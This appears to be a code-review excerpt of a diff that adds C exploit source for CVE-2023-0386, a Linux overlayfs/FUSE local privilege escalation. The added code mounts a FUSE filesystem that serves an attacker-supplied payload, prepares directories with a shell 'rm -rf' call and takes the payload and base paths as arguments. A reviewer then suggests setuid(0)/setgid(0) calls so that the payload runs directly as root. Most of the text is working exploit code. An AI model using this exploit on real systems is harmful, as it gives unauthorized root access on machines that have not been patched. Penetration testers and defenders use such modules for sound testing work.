external/source/exploits/CVE-2023-0386/cve_2023_0386.c

```diff
@@ -0,0 +1,211 @@
+    printf("%s\n", "[+] read_callback");
+    printf("    path  : %s\n", path);
+    printf("    size  : 0x%lx\n", size);
+    printf("    offset: 0x%lx\n", offset);
+    char tmp;
+    if (strcmp(path, "/file") == 0)
+    {
+        size_t len = sizeof(SHELL);
+        if (offset >= len)
+            return 0;
+        if ((size > len) || (offset + size > len))
+        {
+            memcpy(buf, SHELL + offset, len - offset);
+            return len - offset;
+        }
+        else
+        {
+            memcpy(buf, SHELL + offset, size);
+            return size;
+        }
+    }
+    return -ENOENT;
+}
+
+
+// needed for touch
+static int ioctl_callback(const char *p, int cmd, void *arg,
+                          struct fuse_file_info *fi, unsigned int flags, void *data)
+{
+    printf("%s\n", "[+] ioctl callback");
+    printf("path %s\n", p);
+    printf("cmd 0x%x\n", cmd);
+    return 0;
+}
+
+static int readdir_callback(const char *path, void *buf, fuse_fill_dir_t filler, off_t offset, struct fuse_file_info *fi)
+{
+    printf("%s\n", "[+] readdir");
+    filler(buf, "file", NULL, 0);
+    return 0;
+}
+
+static struct fuse_operations fops = {
+    .getattr = getattr_callback,
+    .open = open_callback,
+    .read = read_callback,
+    .ioctl = ioctl_callback,
+    .readdir = readdir_callback,
+};
+
+void start_fuse()
+{
+    struct fuse_args args = FUSE_ARGS_INIT(0, NULL);
+    struct fuse_chan *chan;
+    struct fuse *fuse;
+
+    if (!(chan = fuse_mount(DIR_LOWER, &args)))
+        fatal("fuse_mount");
+
+    if (!(fuse = fuse_new(chan, &args, &fops, sizeof(fops), NULL)))
+    {
+        fuse_unmount(DIR_LOWER, chan);
+        fatal("fuse_new");
+    }
+
+    fuse_set_signal_handlers(fuse_get_session(fuse));
+    fuse_loop_mt(fuse);
+    fuse_unmount(DIR_LOWER, chan);
+}
+
+void preps()
+{
+    char buf[4096];
+    if (mkdir(DIR_BASE, 0777))
+        perror("mkdir");
+    sprintf(buf, "rm -rf '%s/*'", DIR_BASE);
+    system(buf);
+    if (mkdir(DIR_LOWER, 0777))
+        perror("mkdir");
+    if (mkdir(DIR_UPPER, 0777))
+        perror("mkdir");
+    if (mkdir(DIR_WORK, 0777))
+        perror("mkdir");
+    if (mkdir(DIR_MERGE, 0777))
+        perror("mkdir");
+}
+
+int main(int argc, char const *argv[])
+{
+    char buf[8192];
+    // argv[1] = payload to launch
+    // argv[2] = base_dir
+    if (argc < 3)
+    {
+        puts("[-] usage:");
+        puts("./exploit [payload path] [base_dir path]");
+        return -1;
+    }
+
+    int fd = open(argv[1], O_RDONLY);
+    if (fd < 0)
+    {
+        fatal("open payload");
+    }
+    int clen = 0;
+    while (read(fd, SHELL + clen, 1) > 0)
+        clen++;
+    close(fd);
+
+    strcpy(DIR_BASE, argv[2]);
+    snprintf(DIR_WORK, STR_LENGTH, "%s/%s", argv[2], "work");
+    snprintf(DIR_LOWER, STR_LENGTH, "%s/%s", argv[2], "lower");
+    snprintf(DIR_UPPER, STR_LENGTH, "%s/%s", argv[2], "upper");
+    snprintf(DIR_MERGE, STR_LENGTH, "%s/%s", argv[2], "merge");
+
+    preps();
+
```

Comment:
```suggestion
setuid(0)
setgid(0)
```
If you add this, you can directly call the payload without the shell.  It does take a couple seconds longer to establish the session, but it definitely simplifies things.

Reply:
Thanks for catching my lack of semicolons!